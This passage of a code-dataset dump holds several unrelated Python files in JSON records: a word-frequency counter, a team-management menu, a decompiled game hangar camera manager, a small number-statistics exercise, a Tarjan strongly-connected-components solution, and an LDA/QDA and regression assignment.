get_dataloaders_fer48,\r\n 'get_dataloaders': get_dataloaders\r\n}","sub_path":"emotion_detection/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"550410729","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : ssteiche\nDate : 2019-04-24\nPurpose: Count the occurances of words in files \n\"\"\"\n\nimport argparse\nimport sys\nfrom collections import defaultdict\nimport re\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Print word frequencies',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'files', metavar='FILE', help='A positional argument', nargs='+',\n type=argparse.FileType('r', encoding='UTF-8'))\n\n parser.add_argument(\n '-s',\n '--sort',\n help='Sort by word or frequency',\n metavar='str',\n type=str,\n default='word')\n\n parser.add_argument(\n '-m',\n '--min',\n help='Minimum count',\n metavar='int',\n type=int,\n default=0)\n\n return parser.parse_args()\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n# --------------------------------------------------\ndef freqs(infiles):\n \"\"\"build a dictionary with word frequency counts\"\"\"\n counts = defaultdict(int)\n for infile in infiles:\n for line in 
infile:\n            for word in line.split():\n                cleaned = re.sub('[^a-zA-Z0-9]', '', word).lower()\n                if cleaned == '':\n                    continue\n                counts[cleaned] += 1\n\n    return counts\n\n# --------------------------------------------------\ndef main():\n    \"\"\"Make a jazz noise here\"\"\"\n    args = get_args()\n    files = args.files\n    sort = args.sort\n    minc = args.min\n\n    outc = freqs(files)\n    if sort == 'word':\n        for entry in sorted(outc.keys()):\n            if outc[entry] >= minc:\n                print('{:20} {}'.format(entry, outc[entry]))\n    elif sort == 'frequency':\n        pairs = sorted([(x[1], x[0]) for x in outc.items()])\n        for num, word in pairs:\n            if num >= minc:\n                print('{:20} {}'.format(word, num))\n\n    #print(outc.keys())\n# --------------------------------------------------\nif __name__ == '__main__':\n    main()\n","sub_path":"assignments/14-word-freak/freak.py","file_name":"freak.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413008354","text":"from emp_store import teams\nfrom emp_store import employees\nimport employee as e\n\ndef manage_all_team_menu():\n\tprint(\"\\t press 1. create team \")\n\tprint(\"\\t press 2. Display team \")\n\tprint(\"\\t press 3. manage team \")\n\tprint(\"\\t press 4. Delete team \")\n\tprint(\"\\t press 5. exit \")\ndef manage_all_team():\n\twhile True:\n\t\tmanage_all_team_menu()\n\t\tch=int(input(\"enter your choice : \"))\n\t\tif ch == 1:\n\t\t\t#create team\n\t\t\tcreate_team()\n\t\telif ch == 2:\n\t\t\t#display team\n\t\t\tdisplay_team()\n\t\telif ch == 3:\n\t\t\t#manage team\n\t\t\tmanage_team()\n\t\telif ch == 4:\n\t\t\t#delete team\n\t\t\tdelete_team()\n\t\telif ch == 5:\n\t\t\t#exit\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"invalid option\")\ndef create_team():\n\tteam_name=input(\"\\tEnter team name : \")\n\tteams[team_name]=[]\n\t\ndef display_team():\n\tfor key,value in teams.items(): \n\t\tname_string = \"\"\n\t\tfor i in value:\n\t\t\tname_string = name_string +\"|\"+employees[i][\"name\"]\n\t\tprint(f\"{key} => {name_string}\")\n\t\ndef delete_team():\n\tteam_name=input(\"\\tEnter team name \")\n\tif team_name in teams.keys():\n\t\tdel teams[team_name]\n\t\tprint(\"\\t Deleted the team \")\n\telse:\n\t\tprint(\"\\t incorrect name \")\ndef manage_team_menu():\n\tprint(\"\\t press 1. Add member \")\n\tprint(\"\\t press 2. Delete member \")\n\tprint(\"\\t press 3. Display member list \")\n\tprint(\"\\t press 4. 
Exit\")\ndef manage_team():\n\twhile True:\n\t\tteam_name=input(\"\\t\\t Enter team name : \")\n\t\tmanage_team_menu()\n\t\tch=int(input(\"enter your choice\"))\n\t\tif ch == 1:\n #Add member\n\t\t\tadd_member(team_name)\n\t\telif ch == 2:\n #Delete member\n delete_member(team_name)\n\t\telif ch == 3:\n #Display\n\t\t\tdisplay_member(team_name)\n\t\telif ch==4:\n\t\t#exit\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\tinvalid\")\ndef add_member(team_name):\n\te.display_employee()\n\teid=int(input(\"\\t\\t Enter the employee id of employee \"))\n\tif eid in e.employees.keys():\n\t\tteams[team_name].append(eid)\n\telse:\n\t\tprint(\"\\t\\t wrong eid\")\n\ndef delete_member(team_name):\n\tdisplay_member(team_name)\n\temployee_id=int(input(\"\\t\\tEnter the employee id \"))\n\tif employee_id in teams[team_name]:\n\t\tteams[team_name].remove(employee_id)\n\telse:\n\t\tprint(\"\\t\\twrong id\")\n\ndef display_member(team_name):\n\tname_string=\"\"\n\tfor i in teams[team_name]:\n\t\tname_string=name_string +\"|\"+str(i)+\".\"+e.employees[i][\"name\"]\n\tprint(f\"{name_string}\")\n\n\n","sub_path":"teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6869193","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/hangar_cameras/hangar_camera_manager.py\nimport math\nfrom functools import partial\nfrom logging import getLogger\nimport BigWorld\nimport Math\nimport Keys\nfrom AvatarInputHandler import mathUtils\nfrom skeletons.account_helpers.settings_core import ISettingsCore\nfrom skeletons.gui.shared.utils import IHangarSpace\nfrom helpers import dependency\nfrom gui import g_keyEventHandlers, g_mouseEventHandlers\nfrom gui.shared import g_eventBus\nfrom gui.hangar_cameras.hangar_camera_common import CameraRelatedEvents, CameraMovementStates\nfrom gui.hangar_cameras.hangar_camera_idle import HangarCameraIdle\nfrom gui.hangar_cameras.hangar_camera_parallax import HangarCameraParallax\nfrom AvatarInputHandler.cameras import FovExtended\nfrom vehicle_systems.stricted_loading import makeCallbackWeak\n_logger = getLogger(__name__)\nIMMEDIATE_CAMERA_MOVEMENT_MODE = 0\nFAST_CAMERA_MOVEMENT_MODE = 1\nGRADUAL_CAMERA_MOVEMENT_MODE = 2\n\nclass HangarCameraYawFilter(object):\n\n def __init__(self, start, end, camSens):\n self.__start = start\n self.__end = end\n self.__camSens = camSens\n self.__reversed = self.__start > self.__end\n self.__cycled = int(math.degrees(math.fabs(self.__end - self.__start))) >= 359.0\n self.__prevDirection = 0.0\n self.__camSens = camSens\n self.__yawLimits = None\n self.setConstraints(start, end)\n return\n\n def setConstraints(self, start, end):\n self.__start = start\n self.__end = end\n if int(math.fabs(math.degrees(self.__start)) + 0.5) >= 180:\n self.__start *= 179 / 180.0\n if int(math.fabs(math.degrees(self.__end)) + 0.5) >= 180:\n self.__end *= 179 / 180.0\n\n def setYawLimits(self, limits):\n self.__yawLimits = limits\n\n def toLimit(self, inAngle):\n inAngle = mathUtils.reduceToPI(inAngle)\n if self.__cycled:\n return inAngle\n if self.__reversed:\n if inAngle >= self.__start and inAngle <= self.__end:\n return inAngle\n elif self.__start <= inAngle <= self.__end:\n return inAngle\n delta1 = self.__start - inAngle\n delta2 = self.__end - inAngle\n return self.__end if math.fabs(delta1) > math.fabs(delta2) else self.__start\n\n def getNextYaw(self, currentYaw, targetYaw, delta):\n if delta == 0.0 or 
self.__prevDirection * delta < 0.0:\n targetYaw = currentYaw\n self.__prevDirection = delta\n nextYaw = targetYaw + delta * self.__camSens\n if delta > 0.0:\n if nextYaw >= currentYaw:\n deltaYaw = nextYaw - currentYaw\n else:\n deltaYaw = 2.0 * math.pi - currentYaw + nextYaw\n if deltaYaw > math.pi:\n nextYaw = currentYaw + math.pi * 0.9\n else:\n if nextYaw <= currentYaw:\n deltaYaw = currentYaw - nextYaw\n else:\n deltaYaw = 2.0 * math.pi + currentYaw - nextYaw\n if deltaYaw > math.pi:\n nextYaw = currentYaw - math.pi * 0.9\n if not self.__cycled:\n if not self.__reversed:\n if delta > 0.0 and (nextYaw > self.__end or nextYaw < currentYaw):\n nextYaw = self.__end\n elif delta < 0.0 and (nextYaw < self.__start or nextYaw > currentYaw):\n nextYaw = self.__start\n elif delta > 0.0 and nextYaw > self.__end and nextYaw <= self.__start:\n nextYaw = self.__end\n elif delta < 0.0 and nextYaw < self.__start and nextYaw >= self.__end:\n nextYaw = self.__start\n if self.__yawLimits is not None:\n if nextYaw < 0.0:\n nextYaw += 2.0 * math.pi\n nextYaw = mathUtils.clamp(self.__yawLimits[0], self.__yawLimits[1], nextYaw)\n return nextYaw\n\n\nclass HangarCameraManager(object):\n settingsCore = dependency.descriptor(ISettingsCore)\n hangarSpace = dependency.descriptor(IHangarSpace)\n\n @property\n def handleInactiveCamera(self):\n return self.__handleInactiveCamera\n\n @handleInactiveCamera.setter\n def handleInactiveCamera(self, value):\n self.__handleInactiveCamera = value\n\n def __init__(self, spaceId):\n self.__spaceId = spaceId\n self.__cam = None\n self.__cameraIdle = None\n self.__cameraParallax = None\n self.__yawCameraFilter = None\n self.__camConstraints = [ None for _ in range(3) ]\n self.__isMouseDown = False\n self.__currentEntityId = None\n self.__movementDisabled = False\n self.__handleInactiveCamera = False\n self.__isPreviewMode = False\n return\n\n def init(self):\n self.__setupCamera()\n self.__isPreviewMode = False\n self.hangarSpace.onSpaceCreate += self.__onSpaceCreated\n self.hangarSpace.onSpaceDestroy += self.__onSpaceDestroy\n self.settingsCore.onSettingsChanged += self.__handleSettingsChange\n g_eventBus.addListener(CameraRelatedEvents.IDLE_CAMERA, self.__handleIdleCameraActivation)\n g_eventBus.addListener(CameraRelatedEvents.VEHICLE_LOADING, self.__handleVehicleLoading)\n g_eventBus.addListener(CameraRelatedEvents.CAMERA_ENTITY_UPDATED, self.__handleEntityUpdated)\n g_eventBus.addListener(CameraRelatedEvents.FORCE_DISABLE_CAMERA_MOVEMENT, self.__handleDisableMovement)\n\n def destroy(self):\n self.hangarSpace.onSpaceCreate -= self.__onSpaceCreated\n self.hangarSpace.onSpaceDestroy -= self.__onSpaceDestroy\n self.settingsCore.onSettingsChanged -= self.__handleSettingsChange\n g_eventBus.removeListener(CameraRelatedEvents.IDLE_CAMERA, self.__handleIdleCameraActivation)\n g_eventBus.removeListener(CameraRelatedEvents.VEHICLE_LOADING, self.__handleVehicleLoading)\n g_eventBus.removeListener(CameraRelatedEvents.CAMERA_ENTITY_UPDATED, self.__handleEntityUpdated)\n g_eventBus.removeListener(CameraRelatedEvents.FORCE_DISABLE_CAMERA_MOVEMENT, self.__handleDisableMovement)\n if self.__cameraIdle:\n self.__cameraIdle.destroy()\n self.__cameraIdle = None\n if self.__cameraParallax:\n self.__cameraParallax.destroy()\n self.__cameraParallax = None\n if self.__cam is BigWorld.camera():\n self.__cam.spaceID = 0\n BigWorld.worldDrawEnabled(False)\n self.__cam = None\n FovExtended.instance().resetFov()\n return\n\n def __onSpaceCreated(self):\n 
g_mouseEventHandlers.add(self.__handleMouseEvent)\n g_keyEventHandlers.add(self.__handleKeyEvent)\n g_eventBus.addListener(CameraRelatedEvents.LOBBY_VIEW_MOUSE_MOVE, self.__handleLobbyViewMouseEvent)\n\n def __onSpaceDestroy(self, inited):\n if inited:\n g_mouseEventHandlers.remove(self.__handleMouseEvent)\n g_keyEventHandlers.remove(self.__handleKeyEvent)\n g_eventBus.removeListener(CameraRelatedEvents.LOBBY_VIEW_MOUSE_MOVE, self.__handleLobbyViewMouseEvent)\n\n def setCameraLocation(self, targetPos=None, pivotPos=None, yaw=None, pitch=None, dist=None, camConstraints=None, ignoreConstraints=False, movementMode=FAST_CAMERA_MOVEMENT_MODE, previewMode=False):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n sourceMat = Math.Matrix(self.__cam.source)\n yawS = sourceMat.yaw if yaw is None else yaw\n pitchS = sourceMat.pitch if pitch is None else pitch\n if dist is None:\n dist = self.__cam.pivotMaxDist\n if movementMode != IMMEDIATE_CAMERA_MOVEMENT_MODE:\n self.__cam.movementMode = movementMode\n if camConstraints is not None:\n self.__camConstraints = list(camConstraints)\n else:\n self.__camConstraints[0] = cfg['cam_pitch_constr']\n self.__camConstraints[1] = cfg['cam_yaw_constr']\n if not ignoreConstraints:\n if yaw is not None or pitch is not None:\n camYawConstr = self.__camConstraints[1]\n startYaw, endYaw = camYawConstr\n self.__yawCameraFilter.setConstraints(math.radians(startYaw), math.radians(endYaw))\n self.__yawCameraFilter.setYawLimits(camYawConstr)\n yawS = self.__yawCameraFilter.toLimit(yawS)\n camPitchConstr = self.__camConstraints[0]\n startPitch, endPitch = (math.radians(pc) for pc in camPitchConstr)\n pitchS = mathUtils.clamp(startPitch, endPitch, pitchS)\n distConstr = cfg['preview_cam_dist_constr'] if self.__isPreviewMode else self.__camConstraints[2]\n minDist, maxDist = distConstr\n dist = mathUtils.clamp(minDist, maxDist, dist)\n if yaw is not None or pitch is not None:\n mat = Math.Matrix()\n pitchS = mathUtils.clamp(-math.pi / 2 * 0.99, math.pi / 2 * 0.99, pitchS)\n mat.setRotateYPR((yawS, pitchS, 0.0))\n self.__cam.source = mat\n if targetPos is not None:\n targetMat = self.__cam.target\n targetMat.setTranslate(targetPos)\n self.__cam.target = targetMat\n self.__cam.target.setTranslate(targetPos)\n if pivotPos is not None:\n self.__cam.pivotPosition = pivotPos\n self.__cam.pivotMaxDist = dist\n if movementMode == IMMEDIATE_CAMERA_MOVEMENT_MODE:\n self.__cam.forceUpdate()\n self.setPreviewMode(previewMode)\n return\n\n def setPreviewMode(self, previewMode):\n self.__isPreviewMode = previewMode\n\n def isPreviewMode(self):\n return self.__isPreviewMode\n\n def getCurrentEntityId(self):\n return self.__currentEntityId\n\n def getCameraLocation(self):\n sourceMat = Math.Matrix(self.__cam.source)\n targetMat = Math.Matrix(self.__cam.target)\n return {'targetPos': targetMat.translation,\n 'pivotPos': self.__cam.pivotPosition,\n 'yaw': sourceMat.yaw,\n 'pitch': sourceMat.pitch,\n 'dist': self.__cam.pivotMaxDist,\n 'camConstraints': self.__camConstraints,\n 'pivotDist': self.__getCameraPivotDistance()}\n\n def getCameraPosition(self):\n return self.__cam.position\n\n def updateProjection(self):\n BigWorld.callback(0.0, makeCallbackWeak(self.__updateProjection))\n\n def disableMovementByMouse(self, disable):\n self.__movementDisabled = disable\n\n def __updateProjection(self):\n self.__cam.updateProjection()\n\n def __updateCameraByMouseMove(self, dx, dy, dz):\n if self.__cam is None or self.__movementDisabled:\n return\n elif self.__cam != 
BigWorld.camera() and not self.__handleInactiveCamera:\n return\n else:\n sourceMat = Math.Matrix(self.__cam.source)\n yaw = sourceMat.yaw\n pitch = sourceMat.pitch\n if dz < 0.0:\n dist = self.__cam.pivotMaxDist\n else:\n dist = self.__cam.targetMaxDist\n currentMatrix = Math.Matrix(self.__cam.invViewMatrix)\n currentYaw = currentMatrix.yaw\n yaw = self.__yawCameraFilter.getNextYaw(currentYaw, yaw, dx)\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n pitch -= dy * cfg['cam_sens']\n dist -= dz * cfg['cam_dist_sens']\n camPitchConstr = self.__camConstraints[0]\n startPitch, endPitch = camPitchConstr\n pitch = mathUtils.clamp(math.radians(startPitch), math.radians(endPitch), pitch)\n distConstr = cfg['preview_cam_dist_constr'] if self.__isPreviewMode else self.__camConstraints[2]\n minDist, maxDist = distConstr\n dist = mathUtils.clamp(minDist, maxDist, dist)\n mat = Math.Matrix()\n mat.setRotateYPR((yaw, pitch, 0.0))\n self.__cam.source = mat\n self.__cam.pivotMaxDist = dist\n self.__cam.movementMode = FAST_CAMERA_MOVEMENT_MODE\n if self.settingsCore.getSetting('dynamicFov') and abs(distConstr[1] - distConstr[0]) > 0.001:\n relativeDist = (dist - distConstr[0]) / (distConstr[1] - distConstr[0])\n _, minFov, maxFov = self.settingsCore.getSetting('fov')\n fov = mathUtils.lerp(minFov, maxFov, relativeDist)\n BigWorld.callback(0, partial(FovExtended.instance().setFovByAbsoluteValue, math.radians(fov), 0.1))\n return\n\n def __setupCamera(self):\n from gui.ClientHangarSpace import hangarCFG\n cfg = hangarCFG()\n self.__cam = BigWorld.CursorCamera()\n self.__cam.isHangar = True\n self.__cam.spaceID = self.__spaceId\n camDistConstr = cfg['cam_dist_constr']\n minDist, maxDist = camDistConstr\n self.__cam.pivotMaxDist = mathUtils.clamp(minDist, maxDist, cfg['cam_start_dist'])\n self.__cam.pivotMinDist = 0.0\n self.__cam.maxDistHalfLife = cfg['cam_fluency']\n self.__cam.turningHalfLife = cfg['cam_fluency']\n self.__cam.movementHalfLife = cfg['cam_fluency']\n self.__cam.pivotPosition = cfg['cam_pivot_pos']\n self.__camConstraints[0] = cfg['cam_pitch_constr']\n self.__camConstraints[1] = cfg['cam_yaw_constr']\n self.__camConstraints[2] = (0.0, 0.0)\n camYawConstr = self.__camConstraints[1]\n startYaw, endYaw = camYawConstr\n self.__yawCameraFilter = HangarCameraYawFilter(math.radians(startYaw), math.radians(endYaw), cfg['cam_sens'])\n self.__yawCameraFilter.setYawLimits(camYawConstr)\n mat = Math.Matrix()\n yaw = self.__yawCameraFilter.toLimit(math.radians(cfg['cam_start_angles'][0]))\n mat.setRotateYPR((yaw, math.radians(cfg['cam_start_angles'][1]), 0.0))\n self.__cam.source = mat\n mat = Math.Matrix()\n mat.setTranslate(cfg['cam_start_target_pos'])\n self.__cam.target = mat\n self.__cam.forceUpdate()\n BigWorld.camera(self.__cam)\n self.__cameraIdle = HangarCameraIdle(self.__cam)\n self.__cameraParallax = HangarCameraParallax(self.__cam)\n self.__cam.setDynamicCollisions(True)\n\n def __handleMouseEvent(self, event):\n if self.__isMouseDown:\n isGuiVisible = BigWorld.getWatcher('Visibility/GUI')\n if isGuiVisible is not None and isGuiVisible.lower() == 'false':\n self.__updateCameraByMouseMove(event.dx, event.dy, event.dz)\n return True\n return False\n\n def __handleKeyEvent(self, event):\n if event.key == Keys.KEY_LEFTMOUSE:\n self.__isMouseDown = event.isKeyDown()\n\n def __handleLobbyViewMouseEvent(self, event):\n ctx = event.ctx\n self.__updateCameraByMouseMove(ctx['dx'], ctx['dy'], ctx['dz'])\n\n def __handleIdleCameraActivation(self, event):\n if event.ctx['started']:\n 
self.__cam.pivotMaxDist = self.__getCameraPivotDistance()\n\n    def __handleVehicleLoading(self, event):\n        ctx = event.ctx\n        if self.__currentEntityId != ctx['vEntityId']:\n            return\n        isDone = not ctx['started']\n        self.__cam.isMovementEnabled = isDone\n        if isDone:\n            self.__updateCameraDistanceLimits()\n            self.__cam.pivotMaxDist = self.__getCameraPivotDistance()\n            self.__cam.forceUpdate()\n\n    def __handleSettingsChange(self, diff):\n        if 'fov' in diff:\n            _, _, dynamicFOVTop = diff['fov']\n            defaultHorizontalFov = math.radians(dynamicFOVTop)\n\n            def resetFov(value):\n                FovExtended.instance().defaultHorizontalFov = value\n\n            BigWorld.callback(0.0, partial(resetFov, defaultHorizontalFov))\n        self.__updateCameraByMouseMove(0.0, 0.0, 0.0)\n\n    def __handleEntityUpdated(self, event):\n        ctx = event.ctx\n        if ctx['state'] != CameraMovementStates.FROM_OBJECT:\n            self.__currentEntityId = ctx['entityId']\n            self.__updateCameraDistanceLimits()\n\n    def __handleDisableMovement(self, event):\n        self.disableMovementByMouse(event.ctx['disable'])\n\n    def __updateCameraDistanceLimits(self):\n        from gui.ClientHangarSpace import hangarCFG\n        cfg = hangarCFG()\n        entity = BigWorld.entities.get(self.__currentEntityId)\n        modelLength = entity.getModelLength() if entity is not None and hasattr(entity, 'getModelLength') else 0.0\n        minDist = max(modelLength * cfg['cam_min_dist_vehicle_hull_length_k'], cfg['cam_dist_constr'][0])\n        maxDist = entity.cameraMaxDistance if entity is not None and hasattr(entity, 'cameraMaxDistance') else cfg['cam_dist_constr'][1]\n        if maxDist < minDist:\n            _logger.warning('incorrect values - camera MAX distance < camera MIN distance, use min distance as max')\n            maxDist = minDist\n        self.__camConstraints[2] = (minDist, maxDist)\n        return\n\n    def __getCameraPivotDistance(self):\n        from gui.ClientHangarSpace import hangarCFG\n        cfg = hangarCFG()\n        point1 = self.__cam.target.translation + cfg['cam_pivot_pos']\n        point2 = self.__cam.position\n        d2 = (point2 - point1).length\n        d3 = max(self.__cam.targetMaxDist, d2)\n        minDist, maxDist = self.__camConstraints[2]\n        return mathUtils.clamp(minDist, maxDist, d3)\n\n    @property\n    def camera(self):\n        return self.__cam\n","sub_path":"source/res/scripts/client/gui/hangar_cameras/hangar_camera_manager.py","file_name":"hangar_camera_manager.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264229093","text":"print('===== MAIORES E MENORES VALORES =====')\nn1 = int(input('Digite um número: '))\npergunta1 = str(input('Você quer continuar? [S / N]> ')).upper()\n\npergunta2 = pergunta1  # honour the first answer instead of discarding it\nc = 1\nm = n1  # the average of a single number is the number itself\nmaior = n1\nmenor = n1\n\nwhile pergunta2 == 'S':\n    n2 = int(input('Você quer continuar? 
[S / N]> ')).upper()\n    # maior/menor already start at the first value, so just compare with n2\n    if n2 > maior:\n        maior = n2\n    if n2 < menor:\n        menor = n2\n    n1 += n2\n    c += 1\n    m = n1 / c\n\nprint('========= MÉDIA =========')\nprint('A média entre todos os valores é {:.2f}'.format(m))\nprint('='*25)\nprint()\nprint('===== MAIOR E MENOR =====')\nprint('O maior número é {} e o menor é {}'.format(maior, menor))\nprint('='*25)\n\n","sub_path":"ProjetosPython/PraticandoPython/P54-MaioreMenorValores.py","file_name":"P54-MaioreMenorValores.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142322535","text":"# Tarjan's algorithm\n\ndef read_input():\n    n, m = map(int, input().split())\n    if n == m == 0:\n        return\n    adjacent = [[] for i in range(n)]\n    for i in range(m):\n        u, v, p = map(int, input().split())\n        adjacent[u-1].append(v-1)\n        if p == 2:\n            adjacent[v-1].append(u-1)\n    return adjacent, n\n\ndef dfs_tarjan(ide, low, stack, onstack, v, counter, scc_sizes):\n    # counter is a one-element list so the discovery index is shared across calls\n    counter[0] += 1\n    ide[v], low[v] = counter[0], counter[0]\n    onstack[v] = True\n    stack.append(v)\n    for u in adjacent[v]:\n        if ide[u] == 0:\n            dfs_tarjan(ide, low, stack, onstack, u, counter, scc_sizes)\n            low[v] = min(low[u], low[v])\n        elif onstack[u]:\n            # back edge to a vertex still on the stack\n            low[v] = min(ide[u], low[v])\n    if low[v] == ide[v]:\n        count = 0\n        while True:\n            w = stack.pop()\n            onstack[w] = False\n            count += 1\n            if w == v:\n                break\n        scc_sizes.append(count)\n\nif __name__ == \"__main__\":\n    for adjacent, n in iter(read_input, None):\n        ide, low, onstack, stack = [0]*n, [0]*n, [False]*n, []\n        scc_sizes = []\n        dfs_tarjan(ide, low, stack, onstack, 0, [0], scc_sizes)\n        # strongly connected iff the DFS from vertex 0 finds one SCC with all n vertices\n        print(1 if n in scc_sizes else 0)\n\n\n\n","sub_path":"Online Judge/11838 - Come and Go.py","file_name":"11838 - Come and Go.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398774694","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.io import loadmat\nfrom numpy.linalg import det, inv\nfrom math import sqrt, pi, exp\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport pickle\nimport sys\nimport math\n\n\ndef ldaLearn(X, y):\n    # Inputs\n    # X - a N x d matrix with each row corresponding to a training example\n    # y - a N x 1 column vector indicating the labels for each training example\n    #\n    # Outputs\n    # means - A d x k matrix containing learnt means for each of the k classes\n    # covmat - A single d x d learnt covariance matrix\n\n    # IMPLEMENT THIS METHOD\n    # Mean\n    # k classes\n    k = np.unique(y)\n    means = np.zeros([k.shape[0], X.shape[1]])\n    Y = y.flatten()\n    count = np.zeros([k.shape[0]])\n    # Sum of elements of each class\n    for i in range(X.shape[0]):\n        for j in range(X.shape[1]):\n            index = int(Y[i]) - 1\n            means[index][j] = means[index][j] + X[i][j]\n        count[index] = count[index] + 1\n    # Dividing by count of each class to get mean\n    for i in range(k.shape[0]):\n        for j in range(X.shape[1]):\n            means[i][j] = means[i][j] / count[i]\n    means = means.T\n    # Covariance\n    covmat = np.cov(X, rowvar=0)\n    # print (\"LDA mean\", means)\n    # print (\"LDA cov\", covmat)\n    return means, covmat\n\n\ndef qdaLearn(X, y):\n    # Inputs\n    # X - a N x d matrix with each row corresponding to a training example\n    # y - a N x 1 column vector indicating the labels for each training example\n    #\n    # Outputs\n    # means - A d x k matrix containing learnt means for each of the k classes\n    # covmats - A list of k d x d learnt covariance matrices for each of the k classes\n\n    # IMPLEMENT THIS METHOD\n    k = np.unique(y)\n    means = 
np.zeros([k.shape[0], X.shape[1]])\n    Y = y.flatten()\n    count = np.zeros([k.shape[0]])\n    # Sum of elements of each class\n    for i in range(X.shape[0]):\n        for j in range(X.shape[1]):\n            index = int(Y[i]) - 1\n            means[index][j] = means[index][j] + X[i][j]\n        count[index] = count[index] + 1\n    # Dividing by count of each class to get mean\n    for i in range(k.shape[0]):\n        for j in range(X.shape[1]):\n            means[i][j] = means[i][j] / count[i]\n    means = means.T\n    # Covariance\n    covmats = [np.zeros((X.shape[1], X.shape[1]))] * k.shape[0]\n    for i in range(k.size):\n        X_class = X[Y == k[i]]\n        covmats[i] = np.cov(X_class, rowvar=0)\n    # print covmats\n    # print (\"QDA mean\", means)\n    return means, covmats\n\n\ndef ldaTest(means, covmat, Xtest, ytest):\n    # Inputs\n    # means, covmat - parameters of the LDA model\n    # Xtest - a N x d matrix with each row corresponding to a test example\n    # ytest - a N x 1 column vector indicating the labels for each test example\n    # Outputs\n    # acc - A scalar accuracy value\n    # ypred - N x 1 column vector indicating the predicted labels\n\n    # IMPLEMENT THIS METHOD\n    means = means.T\n    k = np.arange(means.shape[0])  # one index per learnt class (do not rely on the global y)\n    Ytest = ytest.flatten()\n    ypred = np.zeros([Xtest.shape[0]])\n    covmat_det = sqrt(np.linalg.det(covmat))\n    covmat_inv = inv(covmat)\n    acc = 0\n    for a in range(Xtest.shape[0]):\n        result = np.zeros([k.shape[0]])\n        for i in range(k.shape[0]):\n            X_mean = Xtest[a] - means[i]\n            epow = -1 / 2 * np.dot(np.dot(X_mean, covmat_inv), X_mean.T)\n            result[i] = (1 / (sqrt(2 * pi) * covmat_det)) * (math.exp(epow))\n        ypred[a] = float(result.argmax(axis=0) + 1)\n        if (ypred[a] == Ytest[a]):\n            acc = acc + 1\n    return acc, ypred\n\n\ndef qdaTest(means, covmats, Xtest, ytest):\n    # Inputs\n    # means, covmats - parameters of the QDA model\n    # Xtest - a N x d matrix with each row corresponding to a test example\n    # ytest - a N x 1 column vector indicating the labels for each test example\n    # Outputs\n    # acc - A scalar accuracy value\n    # ypred - N x 1 column vector indicating the predicted labels\n\n    # IMPLEMENT THIS METHOD\n    means = means.T\n    k = np.arange(means.shape[0])  # one index per learnt class (do not rely on the global y)\n    Ytest = ytest.flatten()\n    ypred = np.zeros([Xtest.shape[0]])\n    acc = 0\n    for a in range(Xtest.shape[0]):\n        result = np.zeros([k.shape[0]])\n        for i in range(k.shape[0]):\n            covmat_det = sqrt(np.linalg.det(covmats[i]))\n            covmat_inv = inv(covmats[i])\n            X_mean = Xtest[a] - means[i]\n            epow = -1 / 2 * np.dot(np.dot(X_mean, covmat_inv), X_mean.T)\n            result[i] = (1 / (sqrt(2 * pi) * covmat_det)) * (math.exp(epow))\n        ypred[a] = float(result.argmax(axis=0) + 1)\n        if (ypred[a] == Ytest[a]):\n            acc = acc + 1\n    return acc, ypred\n\n\ndef learnOLERegression(X, y):\n    # Inputs:\n    # X = N x d\n    # y = N x 1\n    # Output:\n    # w = d x 1\n    # From slide\n    # IMPLEMENT THIS METHOD\n    w = np.dot(inv(np.dot(X.T, X)), np.dot(X.T, y))\n    return w\n\n\ndef learnRidgeRegression(X, y, lambd):\n    # Inputs:\n    # X = N x d\n    # y = N x 1\n    # lambd = ridge parameter (scalar)\n    # Output:\n    # w = d x 1\n    # From slide\n    # IMPLEMENT THIS METHOD\n    XT_X = np.dot(X.T, X)\n    lambda_mat = lambd * np.identity(XT_X.shape[0])\n    w = np.dot(inv((lambda_mat) + XT_X), np.dot(X.T, y))\n    return w\n\n\ndef testOLERegression(w, Xtest, ytest):\n    # Inputs:\n    # w = d x 1\n    # Xtest = N x d\n    # ytest = N x 1\n    # Output:\n    # rmse\n\n    # IMPLEMENT THIS METHOD\n    squ = np.square(ytest - np.dot(Xtest, w))\n    rmse = sqrt(np.sum(squ) / Xtest.shape[0])\n    return rmse\n\n\ndef regressionObjVal(w, X, y, lambd):\n    # compute squared error (scalar) and gradient of squared error with respect\n    # to w (vector) for the given data X and y and the 
